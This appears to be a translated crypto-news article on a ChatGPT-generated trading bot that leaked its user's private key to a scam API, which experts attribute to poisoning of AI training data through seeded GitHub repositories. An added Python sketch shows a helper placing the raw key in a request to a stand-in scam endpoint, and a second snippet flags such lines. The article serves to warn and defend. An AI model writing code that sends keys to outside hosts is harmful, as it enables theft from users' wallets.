Be careful! A cryptocurrency trading bot built with ChatGPT turned out to be 'backdoored': the generated code leaked the user's private key and the wallet was drained within minutes.

A netizen shared yesterday that he tried to use ChatGPT to develop a cryptocurrency trading bot, but ChatGPT referenced a malicious API in the generated code, leading to the leak of his private key. Anti-fraud platform Scam Sniffer called this an AI poisoning incident, and on-chain security expert Yu Xian reminded users to carefully review AI-generated code. (Background: Apple rumored to release an upgraded "LLM Siri" in 2025: an AI life assistant more powerful than ChatGPT) (Additional context: CZ urgently warns: Macs with Intel chips have a major vulnerability, update quickly to protect your assets)

Generative artificial intelligence (AI) has brought us convenience, but we should be wary of fully trusting the content it generates. Yesterday (the 22nd), netizen r_ocky.eth shared that he had asked ChatGPT to help him build a bot to trade pump.fun meme coins, only to find that ChatGPT had embedded a fraudulent API endpoint in the bot's code. As a result, he lost about $2,500. The incident sparked widespread discussion, and security firm founder Yu Xian weighed in as well.

"Be careful with information from @OpenAI! Today I was trying to write a bump bot for and asked @ChatGPTapp to help me with the code. I got what I asked but I didn't expect that ChatGPT would recommend me a scam @solana API website. I lost around $2.5k." — r_ocky.eth (@r_cky0), November 21, 2024

ChatGPT sent the private key to a scam website

According to r_ocky.eth, part of the code ChatGPT generated for him sends his private key in an API request, exactly as ChatGPT recommended. However, the API domain ChatGPT referenced, solanaapis.com, is a fraudulent website, as a search for the URL shows. r_ocky.eth said that after he used this API, the scammers acted quickly: within just 30 minutes they transferred all of his assets to the wallet address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX.
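To illustrate the attack pattern described above (this is not the actual code from the incident, and the endpoint name is hypothetical, modeled on the fraudulent domain mentioned in the article), a backdoored helper might look something like the sketch below. The red flag is that the wallet's raw private key is placed in the request body; a legitimate trading flow signs transactions locally, so the key never appears in any network payload.

```python
# Hypothetical sketch of a backdoored bot helper -- for illustration only.
# Never send a private key to any remote API.
import json

SCAM_API = "https://api.solanaapis.example/pumpfun/buy"  # hypothetical endpoint

def build_buy_request(private_key: str, token_mint: str, amount_sol: float) -> dict:
    """Builds the HTTP request a backdoored bot would send.

    Red flag: the raw private key is embedded in the payload. Any server
    receiving this request can sign transactions and drain the wallet.
    """
    payload = {
        "private_key": private_key,   # <-- the exfiltration: the key leaves the machine
        "mint": token_mint,
        "amount": amount_sol,
    }
    return {"url": SCAM_API, "body": json.dumps(payload)}

# A legitimate flow signs locally and only broadcasts the *signed* transaction.
request = build_buy_request("FAKE_KEY_FOR_DEMO", "SomeTokenMintAddress", 0.5)
assert "FAKE_KEY_FOR_DEMO" in request["body"]  # the key would be sent in plaintext
```

When reviewing AI-generated trading code, this is the first thing to check: does the private key ever appear in anything that goes over the network?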
He said: "I vaguely felt something might be wrong with what I was doing, but my trust in @OpenAI made me drop my guard." He also admitted he made the mistake of using his main wallet's private key, adding: "It's easy to make mistakes when you're rushing to do many things at once." @r_cky0 subsequently published his full conversation with ChatGPT for security research, hoping to prevent similar incidents.

Yu Xian: Really hacked by AI

Commenting on the netizen's misfortune, on-chain security expert Yu Xian said this user was "really hacked by AI": the code GPT produced contained a backdoor that sent the wallet's private key to a phishing website. He also reminded users to stay cautious when using GPT, Claude, and other LLMs, since deceptive output is widespread.

"Looked into it, this fren's wallet was indeed 'compromised' by AI... He wrote a bot with code given by GPT, and unexpectedly the code contained a backdoor that sent the private key to a phishing website... When using GPT/Claude and other LLMs, one must stay cautious; these LLMs exhibit widespread deceptive behavior. I have mentioned AI poisoning attacks before; this is now a real attack case against the crypto industry." — Cos (Yu Xian) (@evilcos), November 22, 2024

ChatGPT deliberately poisoned

In addition, on-chain anti-fraud platform Scam Sniffer pointed out that this is an AI code-poisoning attack: scammers contaminate AI training data with malicious cryptocurrency code in an attempt to steal private keys. It shared the malicious code repositories it discovered:

- solanaapisdev/moonshot-trading-bot
- solanaapisdev/pumpfun-api

Scam Sniffer stated that GitHub user solanaapisdev has created multiple repositories over the past four months in an attempt to manipulate AI into generating malicious code, so please be cautious!
Its recommendations:

- Do not blindly use AI-generated code.
- Carefully review the code's content.
- Store private keys in an offline environment.
- Obtain code only from reliable sources.

Yu Xian's own test: Claude shows higher security awareness

Yu Xian then took the key-stealing code r_ocky.eth shared (the backdoored code GPT produced after being poisoned) and asked both GPT and Claude: "What are the risks in this code?" The results:

- GPT-4o did point out the risk to the private key, but rambled on without hitting the key point.
- Claude-3.5-Sonnet went straight to the point: this code sends out the private key, causing a leak.

This led Yu Xian to remark that which LLM is stronger needs no further explanation. He said: "Code generated by LLMs, especially the more complex kind, should generally be cross-reviewed by other LLMs, and I will always be the final reviewer... For people unfamiliar with code, being deceived by AI is quite common."

Yu Xian added that humans are actually scarier: on the internet and in code repositories, telling true from false is genuinely difficult, so it is no surprise that AI trained on such data gets contaminated and poisoned. He expects AI to grow smarter and learn to security-review each of its outputs, putting humans more at ease, but cautioned that supply-chain poisoning is hard to predict and always appears suddenly.

Related reports:
- Binance refutes! Denies leak of 12.8 million customers' data on the darknet, beware of phishing scams
- A love letter to decentralization believers: cryptography, ethical responsibility, and the crypto-punk movement
- Unveiled: YouTube cryptocurrency tutorial "Writing Smart Contracts with ChatGPT" scammed a victim out of 10 ETH
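The advice above to carefully review AI-generated code can be partly mechanized as a crude first pass. The sketch below (the heuristic patterns are my own assumptions, not a vetted ruleset) flags lines where a private key appears alongside an outbound network call; it is no substitute for reading the code, but it would have caught the pattern in this incident.

```python
import re

# Heuristic patterns; a real review still requires reading the code line by line.
KEY_PATTERN = re.compile(r"private[_\s]?key", re.IGNORECASE)
NETWORK_PATTERN = re.compile(r"requests\.(post|get)|urlopen|fetch\(|https?://", re.IGNORECASE)

def flag_key_exfiltration(source: str) -> list:
    """Return lines that mention a private key and also build a network call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if KEY_PATTERN.search(line) and NETWORK_PATTERN.search(line):
            hits.append(f"line {lineno}: {line.strip()}")
    return hits

malicious = 'requests.post("https://api.example/buy", json={"private_key": pk})'
benign = 'signed = keypair.sign(tx)  # key never leaves the process'
assert flag_key_exfiltration(malicious)      # flagged
assert not flag_key_exfiltration(benign)     # clean
```

A check like this only narrows the search; the final reviewer, as Yu Xian notes, should still be a human.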
